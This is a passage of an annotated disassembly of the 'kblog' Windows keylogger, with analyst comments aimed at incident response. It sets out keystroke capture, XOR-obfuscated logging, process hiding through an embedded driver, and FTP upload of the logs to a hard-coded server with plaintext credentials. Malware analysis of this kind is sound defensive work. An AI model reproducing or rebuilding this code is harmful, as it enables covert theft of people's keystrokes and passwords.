OD贴过来的
; (pasted from OllyDbg "OD"). Intel syntax, 32-bit x86, MSVC-built sample "kblog".
; Column 1 of every instruction line is the virtual address; the / | \ characters in front of
; a mnemonic are OllyDbg's jump/loop arrows, not operands. Where the paste lost a call target
; the line reads "call ;" — the thunks at 004025E6..00402616 show which CRT routine it was.
; OllyDbg's own stale argument annotations ("|Prefix", "|hWnd", "\GetTempFileNameA" ...) in the
; 004023F1 region belong to a different analysis pass and have been replaced with real notes.
; Review notes are in English; the original analyst's Chinese remarks are translated in place.
;------------------------------------------------------; keyboard scan-code decode function ---------------------------------------------
; void __cdecl decode_scancodes(WORD *scan, const char *logfile)   [004014BA]
; In:  [ebp+8] = pointer to a 0-terminated array of 16-bit scan codes (the driver buffer read at 00402277)
;      [ebp+C] = log file name, passed straight through to 004015A9
; Local: [ebp-4] = loop index i (0..0x51)
; Tables: 404210 = WORD[] of numeric-keypad scan codes (entries 0..0x18);
;         00404024 = 6-byte strings, entry i = text written for table index i
; Out: eax unspecified (the caller at 004022CB ignores it); each recognised code is appended to the log.
004014BA push ebp
004014BB mov ebp,esp
004014BD push ecx ; reserves [ebp-4] for i
004014BE /mov eax,[ebp+8]
004014C1 |xor ecx,ecx
004014C3 |mov cx,[eax]
004014C6 |test ecx,ecx
004014C8 |je 00401594 ; scan code 0 terminates the array -> write the final CR,LF and return
004014CE |mov edx,[ebp+8]
004014D1 |xor eax,eax
004014D3 |mov ax,[edx]
004014D6 |cmp eax,0EE
004014DB |je short 004014EA ; 0xEE -> write CR,LF (presumably the line-break marker the driver inserts on IOCTL 80102187)
004014DD |mov ecx,[ebp+8]
004014E0 |xor edx,edx
004014E2 |mov dx,[ecx]
004014E5 |cmp edx,1C
004014E8 |jnz short 00401500 ; 0x1C (Enter make code) also writes CR,LF; anything else goes to the table search
004014EA |mov eax,[ebp+C] ;
004014ED |push eax ; /Arg2 = log file name
004014EE |push 0040426C ; |Arg1 = 0040426C ASCII CR,LF,""
004014F3 |call 004015A9 ; \kblog.004015A9 append CR,LF to the log file
004014F8 |add esp,8
004014FB |jmp 00401586
00401500 |mov dword ptr [ebp-4],0 ; i = 0
00401507 |jmp short 00401512
00401509 |/mov ecx,[ebp-4]
0040150C ||add ecx,1
0040150F ||mov [ebp-4],ecx ; i++
00401512 | cmp dword ptr [ebp-4],52
00401516 ||jge short 00401586 ; i >= 82: no table entry matched, the code is dropped silently
00401518 ||cmp dword ptr [ebp-4],19
0040151C ||jge short 00401552 ; i >= 25: main-keyboard rule
0040151E ||mov edx,[ebp+8]
00401521 ||xor eax,eax
00401523 ||mov ax,[edx]
00401526 ||mov ecx,[ebp-4]
00401529 ||xor edx,edx
0040152B ||mov dx,[ecx*2+404210] ; keypad scan-code table, entry i
00401533 ||cmp eax,edx
00401535 ||jnz short 00401552 ; not keypad entry i -> try the main-keyboard rule
00401537 ||mov eax,[ebp+C]
0040153A ||push eax ; /Arg2
0040153B ||mov ecx,[ebp-4] ; |
0040153E ||imul ecx,ecx,6 ; | string table entries are 6 bytes apart
00401541 ||add ecx,00404024 ; |
00401547 ||push ecx ; |Arg1 = text for table entry i
00401548 ||call 004015A9 ; \kblog.004015A9 write the keypad key's text to the log
0040154D ||add esp,8
00401550 ||jmp short 00401586
00401552 ||cmp dword ptr [ebp-4],19
00401556 ||jl short 00401584
00401558 ||mov edx,[ebp+8]
0040155B ||xor eax,eax
0040155D ||mov ax,[edx]
00401560 ||mov ecx,[ebp-4]
00401563 ||sub ecx,17 ; main-keyboard rule: scan code == i - 0x17 (i in 0x19..0x51 covers codes 2..0x3A)
00401566 ||cmp eax,ecx
00401568 ||jnz short 00401584 ; not this main-keyboard code -> next i
0040156A ||mov edx,[ebp+C]
0040156D ||push edx ; /Arg2
0040156E ||mov eax,[ebp-4] ; |
00401571 ||imul eax,eax,6 ; |
00401574 ||add eax,00404024 ; |
00401579 ||push eax ; |Arg1
0040157A ||call 004015A9 ; \kblog.004015A9 write the main-keyboard key's text to the log
0040157F ||add esp,8
00401582 ||jmp short 00401586
00401584 |\jmp short 00401509
00401586 |mov ecx,[ebp+8]
00401589 |add ecx,2 ; advance to the next 16-bit scan code
0040158C |mov [ebp+8],ecx
0040158F \jmp 004014BE
00401594 mov edx,[ebp+C]
00401597 push edx ; /Arg2
00401598 push 00404270 ; |Arg1 = 00404270 ASCII CR,LF,""
0040159D call 004015A9 ; \kblog.004015A9 write CR,LF to the log file
004015A2 add esp,8
004015A5 mov esp,ebp
004015A7 pop ebp
004015A8 retn
;------------------------------------------------------; keystroke-log obfuscate-and-append function ---------------------------------------------
; void __cdecl log_append(const char *text, const char *logfile)   [004015A9]
; In:  [ebp+8] = text to append, [ebp+C] = log file name
; Locals: [ebp-378] = 0x200-byte copy of text; [ebp-178] = strlen(text); [ebp-174] = byte index;
;         [ebp-170] = fstream object; [ebp-10C] = copy of the file name
; Globals: 404768 = rolling key index (kept in 0..9), 404018 = 10-byte XOR key
; Security note: the "encryption" is a byte-wise XOR with a fixed 10-byte key cycled by a global
; counter; the key is in the binary, so the .dat logs are trivially recoverable — treat them as
; plaintext during incident response. The counter is reset to 0 after each upload (00401B26),
; so every uploaded file starts at key byte 0.
; Note: the strcpy into [ebp-378] is unbounded; the visible callers pass 6-byte table strings,
; CR,LF, or 0x100-byte buffers, which fit, but the function itself does not guard the length.
004015A9 push ebp
004015AA mov ebp, esp
004015AC push -1
004015AE push 0040265D ; SEH frame install (handler 0040265D; unwind funclet 00402650 destroys the fstream)
004015B3 mov eax, dword ptr fs:[0]
004015B9 push eax
004015BA mov dword ptr fs:[0], esp
004015C1 sub esp, 36C
004015C7 push esi
004015C8 push 1
004015CA lea ecx, dword ptr [ebp-170]
004015D0 call dword ptr [<&MSVCIRT.fstream::fstre>; construct the fstream object
004015D6 mov dword ptr [ebp-4], 0
004015DD mov eax, dword ptr [ebp+8]
004015E0 push eax ; /src = text argument
004015E1 lea ecx, dword ptr [ebp-378] ; |
004015E7 push ecx ; |dest
004015E8 call ; \strcpy
004015ED add esp, 8
004015F0 lea edx, dword ptr [ebp-378]
004015F6 push edx ; /s
004015F7 call ; \strlen  length of the text
004015FC add esp, 4
004015FF mov dword ptr [ebp-178], eax ; save the length
00401605 mov dword ptr [ebp-174], 0
0040160F jmp short 00401620
00401611 /mov eax, dword ptr [ebp-174]
00401617 |add eax, 1
0040161A |mov dword ptr [ebp-174], eax ; index++
00401620 mov ecx, dword ptr [ebp-174]
00401626 |cmp ecx, dword ptr [ebp-178]
0040162C |jge short 00401683 ; all bytes processed -> open the file
0040162E |mov edx, dword ptr [ebp-174]
00401634 |movsx ecx, byte ptr [ebp+edx-378]
0040163C |mov eax, dword ptr [404768]
00401641 |cdq
00401642 |mov esi, 0A
00401647 |idiv esi ; edx = [404768] % 10
00401649 |movsx edx, byte ptr [edx+404018] ; key byte
00401650 |xor ecx, edx ; text[index] ^= key[[404768] % 10]
00401652 |mov eax, dword ptr [ebp-174]
00401658 |mov byte ptr [ebp+eax-378], cl ; store the XORed byte back in place
0040165F |mov ecx, dword ptr [404768]
00401665 |add ecx, 1
00401668 |mov dword ptr [404768], ecx ; [404768]++
0040166E |cmp dword ptr [404768], 9
00401675 |jle short 00401681 ; still 0..9
00401677 |mov dword ptr [404768], 0 ; wrap the key index
00401681 \jmp short 00401611
00401683 mov edx, dword ptr [ebp+C]
00401686 push edx ; /src
00401687 lea eax, dword ptr [ebp-10C] ; |
0040168D push eax ; |dest
0040168E call ; \strcpy  copy the file name
00401693 add esp, 8
00401696 mov ecx, dword ptr [<&MSVCIRT.filebuf::>; MSVCIRT.filebuf::openprot
0040169C mov edx, dword ptr [ecx]
0040169E push edx
0040169F push 8A ; open mode 0x8A (by the old-iostream flag values: out|app|binary)
004016A4 lea eax, dword ptr [ebp-10C]
004016AA push eax
004016AB lea ecx, dword ptr [ebp-170]
004016B1 call dword ptr [<&MSVCIRT.fstream::open>>; MSVCIRT.fstream::open on the log file name
004016B7 mov ecx, dword ptr [ebp-170]
004016BD mov edx, dword ptr [ecx+4]
004016C0 lea ecx, dword ptr [ebp+edx-170] ; virtual-base adjustment to the ios sub-object
004016C7 call dword ptr [<&MSVCIRT.ios::fail>] ; MSVCIRT.ios::fail
004016CD test eax, eax
004016CF jnz short 004016F7 ; open failed -> skip the write silently (no retry, no error report)
004016D1 mov eax, dword ptr [ebp-178]
004016D7 push eax
004016D8 lea ecx, dword ptr [ebp-378]
004016DE push ecx
004016DF lea ecx, dword ptr [ebp-164]
004016E5 call dword ptr [<&MSVCIRT.ostream::write>; MSVCIRT.ostream::write  append the XORed bytes
004016EB lea ecx, dword ptr [ebp-170]
004016F1 call dword ptr [<&MSVCIRT.fstream::close>; MSVCIRT.fstream::close
004016F7 mov dword ptr [ebp-4], -1
004016FE lea ecx, dword ptr [ebp-170]
00401704 call dword ptr [<&MSVCIRT.fstream::`vbas>; MSVCIRT.fstream::`vbase destructor'
0040170A mov ecx, dword ptr [ebp-C]
0040170D mov dword ptr fs:[0], ecx ; pop the SEH frame
00401714 pop esi
00401715 mov esp, ebp
00401717 pop ebp
00401718 retn
;------------------------------------------------------; log-file upload function ---------------------------------------------
; int __cdecl upload_log(const char *localfile)   [00401719]
; In:  [ebp+8] = path of the local log file
; Out: eax = 1 on success (local file deleted, XOR counter 404768 reset); 0 on any failure or timeout
;      (handles opened so far are closed, the local file is kept for the next attempt)
; Locals: [ebp-318] = hInternet, [ebp-8] = hConnect, [ebp-4] = hFind, [ebp-310] = last API result,
;         [ebp-C] = remote counter value, [ebp-660] = port (0x15 = 21), [ebp-314]/[ebp-764] = tick stamps,
;         [ebp-10C] server (later reused for the counter string), [ebp-20C] user, [ebp-65C] password,
;         [ebp-760] remote path, [ebp-418] local path, [ebp-558] WIN32_FIND_DATA ([ebp-52C] = its cFileName),
;         [ebp-30C] scratch path
; Security note: FTP server, account and password are plain-text literals (00404274/00404284/0040428C)
; and the user-agent is spoofed as "IEXPLORE.EXE" — useful static and network indicators.
; Each WinINet step is retried in a busy loop against a GetTickCount deadline.
00401719 push ebp
0040171A mov ebp,esp
0040171C sub esp,764
00401722 mov dword ptr [ebp-318],0 ; hInternet
0040172C mov dword ptr [ebp-8],0 ; hConnect
00401733 mov dword ptr [ebp-4],0 ; hFind
0040173A mov dword ptr [ebp-55C],0
00401744 mov dword ptr [ebp-310],0
0040174E mov dword ptr [ebp-660],15 ; port 21
00401758 mov dword ptr [ebp-C],0
0040175F push 00404274 ; /src = "59.34.131.54"  FTP server (hard-coded)
00401764 lea eax,[ebp-10C] ; |
0040176A push eax ; |dest
0040176B call ; \strcpy
00401770 add esp,8
00401773 push 00404284 ; /src = "coco"  account (hard-coded)
00401778 lea ecx,[ebp-20C] ; |
0040177E push ecx ; |dest
0040177F call ; \strcpy
00401784 add esp,8
00401787 push 0040428C ; /src = "upstair"  password (hard-coded, plain text)
0040178C lea edx,[ebp-65C] ; |
00401792 push edx ; |dest
00401793 call ; \strcpy
00401798 add esp,8
0040179B push 00404294 ; /src = "\cert\cnt\*"  remote counter directory
004017A0 lea eax,[ebp-760] ; |
004017A6 push eax ; |dest
004017A7 call ; \strcpy
004017AC add esp,8
004017AF mov ecx,[ebp+8]
004017B2 push ecx ; /src
004017B3 lea edx,[ebp-418] ; |
004017B9 push edx ; |dest
004017BA call ; \strcpy
004017BF add esp,8
004017C2 lea eax,[ebp-558]
004017C8 push eax ; /pFindFileData
004017C9 lea ecx,[ebp-418] ; |
004017CF push ecx ; |FileName
004017D0 call [<&KERNEL32.FindFirstFileA>] ; \FindFirstFileA  does the local log file exist?
004017D6 mov [ebp-55C],eax
004017DC cmp dword ptr [ebp-55C],0
004017E3 jnz short 004017EC ; exists -> continue (FindFirstFileA fails with INVALID_HANDLE_VALUE = -1, not 0, so this check never trips; the find handle is also never closed)
004017E5 xor eax,eax
004017E7 jmp 00401B35 ; return 0
004017EC call [<&KERNEL32.GetTickCount>] ; [GetTickCount
004017F2 mov [ebp-314],eax ; deadline base
004017F8 /cmp dword ptr [ebp-318],0
004017FF |jnz short 00401843 ; InternetOpen succeeded -> next step
00401801 |call [<&KERNEL32.GetTickCount>] ; [GetTickCount
00401807 |mov [ebp-764],eax
0040180D |mov edx,[ebp-764] ;
00401813 |sub edx,[ebp-314]
00401819 |cmp edx,1388
0040181F |jbe short 00401828 ; within 5 s (0x1388 ms) -> retry
00401821 |xor eax,eax
00401823 |jmp 00401B35 ; InternetOpen timed out -> return 0
00401828 |push 0
0040182A |push 0
0040182C |push 0
0040182E |push 0
00401830 |push 004042A0 ; ASCII "IEXPLORE.EXE"  user-agent string, masquerading as the browser
00401835 |call [<&WININET.InternetOpenA>] ; WININET.InternetOpenA
0040183B |mov [ebp-318],eax
00401841 \jmp short 004017F8 ; loop
00401843 call [<&KERNEL32.GetTickCount>] ; [GetTickCount
00401849 mov [ebp-314],eax
0040184F /cmp dword ptr [ebp-8],0
00401853 |jnz short 004018BD ; InternetConnect succeeded -> next step
00401855 |call [<&KERNEL32.GetTickCount>] ; [GetTickCount
0040185B |mov [ebp-764],eax
00401861 |mov eax,[ebp-764]
00401867 |sub eax,[ebp-314]
0040186D |cmp eax,1770
00401872 |jbe short 00401888 ; within 6 s (0x1770 ms) -> retry
00401874 |mov ecx,[ebp-318] ; otherwise the connection timed out: close hInternet and return 0
0040187A |push ecx
0040187B |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle
00401881 |xor eax,eax
00401883 |jmp 00401B35
00401888 |push 0 ; dwContext
0040188A |push 0 ; dwFlags
0040188C |push 1 ; INTERNET_SERVICE_FTP
0040188E |lea edx,[ebp-65C]
00401894 |push edx ; password
00401895 |lea eax,[ebp-20C]
0040189B |push eax ; user
0040189C |mov cx,[ebp-660]
004018A3 |push ecx ; port 21
004018A4 |lea edx,[ebp-10C]
004018AA |push edx ; server
004018AB |mov eax,[ebp-318]
004018B1 |push eax ; hInternet
004018B2 |call [<&WININET.InternetConnectA>] ; WININET.InternetConnectA  FTP session
004018B8 |mov [ebp-8],eax
004018BB \jmp short 0040184F
004018BD call [<&KERNEL32.GetTickCount>] ; [GetTickCount
004018C3 mov [ebp-314],eax
004018C9 /cmp dword ptr [ebp-4],0
004018CD |jnz short 0040192E ; a file was found in the remote counter directory -> continue
004018CF |call [<&KERNEL32.GetTickCount>] ; [GetTickCount
004018D5 |mov [ebp-764],eax
004018DB |mov ecx,[ebp-764]
004018E1 |sub ecx,[ebp-314]
004018E7 |cmp ecx,2710
004018ED |jbe short 0040190D ; within 10 s (0x2710 ms) -> retry
004018EF |mov edx,[ebp-8] ; otherwise close hConnect and hInternet, return 0
004018F2 |push edx
004018F3 |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle
004018F9 |mov eax,[ebp-318]
004018FF |push eax
00401900 |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle
00401906 |xor eax,eax
00401908 |jmp 00401B35
0040190D |push 0
0040190F |push 0
00401911 |lea ecx,[ebp-558]
00401917 |push ecx ; WIN32_FIND_DATA out
00401918 |lea edx,[ebp-760]
0040191E |push edx ; "\cert\cnt\*"
0040191F |mov eax,[ebp-8]
00401922 |push eax
00401923 |call [<&WININET.FtpFindFirstFileA>] ; WININET.FtpFindFirstFileA  list the remote counter directory
00401929 |mov [ebp-4],eax
0040192C \jmp short 004018C9 ; loop
0040192E push 004042B0 ; /src = "\cert\cnt\"
00401933 lea ecx,[ebp-30C] ; |
00401939 push ecx ; |dest
0040193A call ; \strcpy
0040193F add esp,8
00401942 lea edx,[ebp-30C]
00401948 push edx ; /src
00401949 lea eax,[ebp-760] ; |
0040194F push eax ; |dest
00401950 call ; \strcpy  [ebp-760] = "\cert\cnt\"
00401955 add esp,8
00401958 lea ecx,[ebp-52C]
0040195E push ecx ; /src = cFileName of the entry found
0040195F lea edx,[ebp-30C] ; |
00401965 push edx ; |dest
00401966 call ; \strcat  [ebp-30C] = "\cert\cnt\<oldname>"
0040196B add esp,8
0040196E lea eax,[ebp-52C]
00401974 push eax ; /s
00401975 call [<&MSVCRT.atol>] ; \atol  the remote file name is a decimal counter
0040197B add esp,4
0040197E mov [ebp-C],eax
00401981 mov ecx,[ebp-C]
00401984 add ecx,1 ; counter + 1
00401987 mov [ebp-C],ecx
0040198A push 0A ; /radix = A (10.)
0040198C lea edx,[ebp-10C] ; |
00401992 push edx ; |string  (reuses the server-name buffer)
00401993 mov eax,[ebp-C] ; |
00401996 push eax ; |value
00401997 call [<&MSVCRT._ltoa>] ; \_ltoa  back to a decimal string
0040199D add esp,0C
004019A0 lea ecx,[ebp-10C]
004019A6 push ecx ; /src
004019A7 lea edx,[ebp-760] ; |
004019AD push edx ; |dest
004019AE call ; \strcat  [ebp-760] = "\cert\cnt\<counter+1>"
004019B3 add esp,8
004019B6 call [<&KERNEL32.GetTickCount>] ; [GetTickCount
004019BC mov [ebp-314],eax
004019C2 /cmp dword ptr [ebp-310],0
004019C9 |jnz short 00401A32 ; rename succeeded -> build the upload path
004019CB |call [<&KERNEL32.GetTickCount>] ; [GetTickCount
004019D1 |mov [ebp-764],eax
004019D7 |mov eax,[ebp-764]
004019DD |sub eax,[ebp-314]
004019E3 |cmp eax,2710
004019E8 |jbe short 00401A12 ; within 10 s -> retry
004019EA |mov ecx,[ebp-8] ; otherwise close all three handles and return 0
004019ED |push ecx
004019EE |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle
004019F4 |mov edx,[ebp-318]
004019FA |push edx
004019FB |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle
00401A01 |mov eax,[ebp-4]
00401A04 |push eax
00401A05 |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle
00401A0B |xor eax,eax
00401A0D |jmp 00401B35
00401A12 |lea ecx,[ebp-760]
00401A18 |push ecx ; new name
00401A19 |lea edx,[ebp-30C]
00401A1F |push edx ; old name
00401A20 |mov eax,[ebp-8]
00401A23 |push eax
00401A24 |call [<&WININET.FtpRenameFileA>] ; WININET.FtpRenameFileA  the counter file is renamed to counter+1
00401A2A |mov [ebp-310],eax
00401A30 \jmp short 004019C2
00401A32 push 004042BC ; /src = "\cert\dat\"  remote log directory
00401A37 lea ecx,[ebp-760] ; |
00401A3D push ecx ; |dest
00401A3E call ; \strcpy
00401A43 add esp,8
00401A46 lea edx,[ebp-10C]
00401A4C push edx ; /src = "<counter+1>"
00401A4D lea eax,[ebp-760] ; |
00401A53 push eax ; |dest
00401A54 call ; \strcat
00401A59 add esp,8
00401A5C push 004042C8 ; /src = ".dat"
00401A61 lea ecx,[ebp-760] ; |
00401A67 push ecx ; |dest
00401A68 call ; \strcat  remote path = "\cert\dat\<counter+1>.dat"
00401A6D add esp,8
00401A70 mov dword ptr [ebp-310],0
00401A7A call [<&KERNEL32.GetTickCount>] ; [GetTickCount
00401A80 mov [ebp-314],eax
00401A86 /cmp dword ptr [ebp-310],0
00401A8D |jnz short 00401AF8 ; FtpPutFile succeeded -> clean up
00401A8F |call [<&KERNEL32.GetTickCount>] ; [GetTickCount
00401A95 |mov [ebp-764],eax
00401A9B |mov edx,[ebp-764]
00401AA1 |sub edx,[ebp-314]
00401AA7 |cmp edx,4E20
00401AAD |jbe short 00401AD4 ; within 20 s (0x4E20 ms) -> retry
00401AAF |mov eax,[ebp-8] ; otherwise close all three handles and return 0
00401AB2 |push eax
00401AB3 |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle
00401AB9 |mov ecx,[ebp-318]
00401ABF |push ecx
00401AC0 |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle
00401AC6 |mov edx,[ebp-4]
00401AC9 |push edx
00401ACA |call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle
00401AD0 |xor eax,eax
00401AD2 |jmp short 00401B35
00401AD4 |push 0 ; dwContext
00401AD6 |push 2 ; dwFlags = FTP_TRANSFER_TYPE_BINARY
00401AD8 |lea eax,[ebp-760]
00401ADE |push eax ; remote file
00401ADF |lea ecx,[ebp-418]
00401AE5 |push ecx ; local file
00401AE6 |mov edx,[ebp-8]
00401AE9 |push edx
00401AEA |call [<&WININET.FtpPutFileA>] ; WININET.FtpPutFileA  upload the log
00401AF0 |mov [ebp-310],eax
00401AF6 \jmp short 00401A86 ; loop
00401AF8 lea eax,[ebp-418]
00401AFE push eax ; /FileName
00401AFF call [<&KERNEL32.DeleteFileA>] ; \DeleteFileA  the local log is deleted after a successful upload
00401B05 mov ecx,[ebp-8]
00401B08 push ecx
00401B09 call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle
00401B0F mov edx,[ebp-318]
00401B15 push edx
00401B16 call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle
00401B1C mov eax,[ebp-4]
00401B1F push eax
00401B20 call [<&WININET.InternetCloseHandle>] ; WININET.InternetCloseHandle
00401B26 mov dword ptr [404768],0 ; reset the XOR key index so the next .dat starts at key byte 0
00401B30 mov eax,1
00401B35 mov esp,ebp
00401B37 pop ebp
00401B38 retn
;------------------------------------------------------; program entry (main) ---------------------------
; int main()   [00401B39]   returns 0 via 0040237B, -1 via 004023B0
; Locals of note: [ebp-84], [ebp-380] = two fstream objects; [ebp-31C]/[ebp-20] = driver file names;
;   [ebp-18] = hModule; [ebp-390] = hResInfo; [ebp-6B8] = hResData; [ebp-1C] = resource bytes; [ebp-4A0] = size;
;   [ebp-49C] = current-directory path (also published via global 40455C); [ebp-14] = SCM handle;
;   [ebp-6B0] = temp path; [ebp-5A8] = temp log file name; [ebp-318] = host name, then "host---ip";
;   [ebp-10] = "\\.\kbdev" device handle; [ebp-398] = own thread id; [ebp-AC4]/[ebp-6BC] = current/previous
;   foreground window; [ebp-218]/[ebp-5AC] = current/previous focus control; [ebp-4A4] = foreground thread id;
;   [ebp-388] = tick of the last upload; [ebp-AC0] = 0x400-byte scan-code buffer; [ebp-39C] = bytes returned
; Behaviour (defender's summary of what follows): requires admin; writes msdtx.sys (resource 6A) and
;   kbdrv.sys (resource 69) from its own resources into the current directory, loads each and deletes the
;   file; installs and starts a service named by [404260]; logs "hostname---ip"; then polls the keyboard
;   driver every 1 ms, logging window titles and decoded keystrokes to a %TEMP% file that is uploaded
;   over FTP every 50 min (0x2DC6C0 ms).
00401B39 >push ebp
00401B3A mov ebp,esp
00401B3C push -1
00401B3E push 00402681 ; SEH frame install (handler 00402681)
00401B43 mov eax,fs:[0]
00401B49 push eax
00401B4A mov fs:[0],esp
00401B51 sub esp,0AC0
00401B57 mov dword ptr [ebp-AC4],0
00401B61 mov dword ptr [ebp-6BC],0
00401B6B mov dword ptr [ebp-398],0
00401B75 mov dword ptr [ebp-4A4],0
00401B7F mov dword ptr [ebp-5B0],0
00401B89 mov dword ptr [ebp-218],0
00401B93 mov dword ptr [ebp-5AC],0
;------------------------------------------------------; construct the two fstream objects --------------------------
00401B9D push 1
00401B9F lea ecx,[ebp-84]
00401BA5 call [<&MSVCIRT.fstream::fstream>] ; MSVCIRT.fstream::fstream
00401BAB mov dword ptr [ebp-4],0
00401BB2 push 1
00401BB4 lea ecx,[ebp-380]
00401BBA call [<&MSVCIRT.fstream::fstream>] ; MSVCIRT.fstream::fstream
00401BC0 mov byte ptr [ebp-4],1
;-----------------------------------------------------------------------------------------------
00401BC4 mov dword ptr [ebp-31C],004042D0 ; ASCII "\kbdrv.sys"  keyboard-filter driver file name
00401BCE mov dword ptr [ebp-20],004042DC ; ASCII "\msdtx.sys"  process-hiding driver file name
00401BD5 mov dword ptr [ebp-14],0
00401BDC mov dword ptr [ebp-38C],0
00401BE6 mov dword ptr [ebp-39C],0
00401BF0 mov dword ptr [ebp-10],0
00401BF7 call 004012B0 ; check for administrator rights (body not in this listing)
00401BFC mov [ebp-38C],eax
00401C02 cmp dword ptr [ebp-38C],0
00401C09 jnz short 00401C10 ; has rights -> continue
00401C0B jmp 004023B0 ; otherwise destroy the fstreams and return -1
00401C10 push 0
00401C12 call [<&KERNEL32.GetModuleHandleA>] ; KERNEL32.GetModuleHandleA  own module
00401C18 mov [ebp-18],eax
00401C1B lea eax,[ebp-49C]
;------------------------------------------------------; locate and load the process-hiding driver from the resources --------------
00401C21 push eax
00401C22 push 100
00401C27 call [<&KERNEL32.GetCurrentDirectoryA>] ; KERNEL32.GetCurrentDirectoryA
00401C2D mov ecx,[ebp-20]
00401C30 push ecx
00401C31 lea edx,[ebp-49C]
00401C37 push edx
00401C38 call ; strcat: full path of the driver file
00401C3D add esp,8
00401C40 lea eax,[ebp-49C]
00401C46 mov [40455C],eax ; global pointer to the path buffer, used by the delete-on-failure paths
00401C4B push 004042E8 ; ASCII "sys"  resource type
00401C50 push 6A ; resource id 0x6A
00401C52 mov ecx,[ebp-18]
00401C55 push ecx ;
00401C56 call [<&KERNEL32.FindResourceA>] ; KERNEL32.FindResourceA  locate the embedded driver
00401C5C mov [ebp-390],eax
00401C62 cmp dword ptr [ebp-390],0
00401C69 jnz short 00401C70 ; found -> continue
00401C6B jmp 004023B0 ; otherwise return -1
00401C70 mov edx,[ebp-390]
00401C76 push edx
00401C77 mov eax,[ebp-18]
00401C7A push eax
00401C7B call [<&KERNEL32.LoadResource>] ; KERNEL32.LoadResource  load into memory
00401C81 mov [ebp-6B8],eax
00401C87 cmp dword ptr [ebp-6B8],0
00401C8E jnz short 00401C95 ; loaded -> continue
00401C90 jmp 004023B0 ; otherwise return -1
;------------------------------------------------------; write the driver file msdtx.sys (used to hide its own process) -------
00401C95 mov ecx,[ebp-6B8]
00401C9B push ecx
00401C9C call [<&KERNEL32.LockResource>] ; KERNEL32.LockResource  pointer to the resource bytes (the original note said SetHandleCount, which does not match the import)
00401CA2 mov [ebp-1C],eax
00401CA5 cmp dword ptr [ebp-1C],0
00401CA9 jnz short 00401CB0 ; got a pointer -> continue
00401CAB jmp 004023B0 ; otherwise return -1
00401CB0 mov edx,[ebp-390]
00401CB6 push edx
00401CB7 mov eax,[ebp-18]
00401CBA push eax
00401CBB call [<&KERNEL32.SizeofResource>] ; KERNEL32.SizeofResource  resource size
00401CC1 mov [ebp-4A0],eax
00401CC7 mov ecx,[<&MSVCIRT.filebuf::openprot>] ; MSVCIRT.filebuf::openprot
00401CCD mov edx,[ecx]
00401CCF push edx
00401CD0 push 8A ; open mode 0x8A (as in 004015A9)
00401CD5 mov eax,[40455C]
00401CDA push eax
00401CDB lea ecx,[ebp-380]
00401CE1 call [<&MSVCIRT.fstream::open>] ; open the driver file for writing
00401CE7 mov ecx,[ebp-380]
00401CED mov edx,[ecx+4]
00401CF0 lea ecx,[ebp+edx-380]
00401CF7 call [<&MSVCIRT.ios::fail>] ; MSVCIRT.ios::fail
00401CFD test eax,eax
00401CFF je short 00401D06 ; opened -> continue
00401D01 jmp 004023B0 ; otherwise return -1
00401D06 mov eax,[ebp-4A0]
00401D0C push eax
00401D0D mov ecx,[ebp-1C]
00401D10 push ecx
00401D11 lea ecx,[ebp-374]
00401D17 call [<&MSVCIRT.ostream::write>] ; MSVCIRT.ostream::write  write the driver image
00401D1D lea ecx,[ebp-380]
00401D23 call [<&MSVCIRT.fstream::close>] ; MSVCIRT.fstream::close
;------------------------------------------------------; load the driver and hide the own process ----------------
00401D29 call 004023F1 ; load the driver (see 004023F1)
00401D2E cmp eax,-1
00401D31 jnz short 00401D45 ; loaded -> continue
00401D33 mov edx,[40455C] ; otherwise delete the driver file and return -1
00401D39 push edx
00401D3A call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA
00401D40 jmp 004023B0
00401D45 call [<&MSVCRT._getpid>] ; MSVCRT._getpid  own PID
00401D4B mov [ebp-384],eax
00401D51 mov eax,[ebp-384]
00401D57 push eax
00401D58 call 004025A3 ; ask the driver to hide this PID (see 004025A3)
00401D5D add esp,4
00401D60 mov [ebp-6B4],eax
00401D66 cmp dword ptr [ebp-6B4],0
00401D6D jnz short 00401D81 ; hidden -> continue
00401D6F mov ecx,[40455C] ; otherwise delete the file and return -1
00401D75 push ecx
00401D76 call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA
00401D7C jmp 004023B0
00401D81 mov edx,[40455C]
00401D87 push edx ;
00401D88 call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA  the on-disk driver is removed once loaded (anti-forensic; recover it from resource 6A instead)
;------------------------------------------------------; locate and load the keyboard-filter driver from the resources --------------
00401D8E lea eax,[ebp-49C]
00401D94 push eax
00401D95 push 100
00401D9A call [<&KERNEL32.GetCurrentDirectoryA>] ; KERNEL32.GetCurrentDirectoryA
00401DA0 mov ecx,[ebp-31C]
00401DA6 push ecx
00401DA7 lea edx,[ebp-49C]
00401DAD push edx
00401DAE call ; strcat: full path of the driver file
00401DB3 add esp,8
00401DB6 lea eax,[ebp-49C]
00401DBC mov [40455C],eax
00401DC1 push 004042EC ; ASCII "sys"
00401DC6 push 69 ; resource id 0x69
00401DC8 mov ecx,[ebp-18]
00401DCB push ecx
00401DCC call [<&KERNEL32.FindResourceA>] ; KERNEL32.FindResourceA
00401DD2 mov [ebp-390],eax
00401DD8 cmp dword ptr [ebp-390],0
00401DDF jnz short 00401DE6 ; found -> continue
00401DE1 jmp 004023B0 ; otherwise return -1
00401DE6 mov edx,[ebp-390]
00401DEC push edx
00401DED mov eax,[ebp-18]
00401DF0 push eax
00401DF1 call [<&KERNEL32.LoadResource>] ; KERNEL32.LoadResource  load into memory
00401DF7 mov [ebp-6B8],eax
00401DFD cmp dword ptr [ebp-6B8],0
00401E04 jnz short 00401E0B ; loaded -> continue
00401E06 jmp 004023B0 ; otherwise return -1
;------------------------------------------------------; write the driver file kbdrv.sys (keyboard filter) --------------
00401E0B mov ecx,[ebp-6B8]
00401E11 push ecx
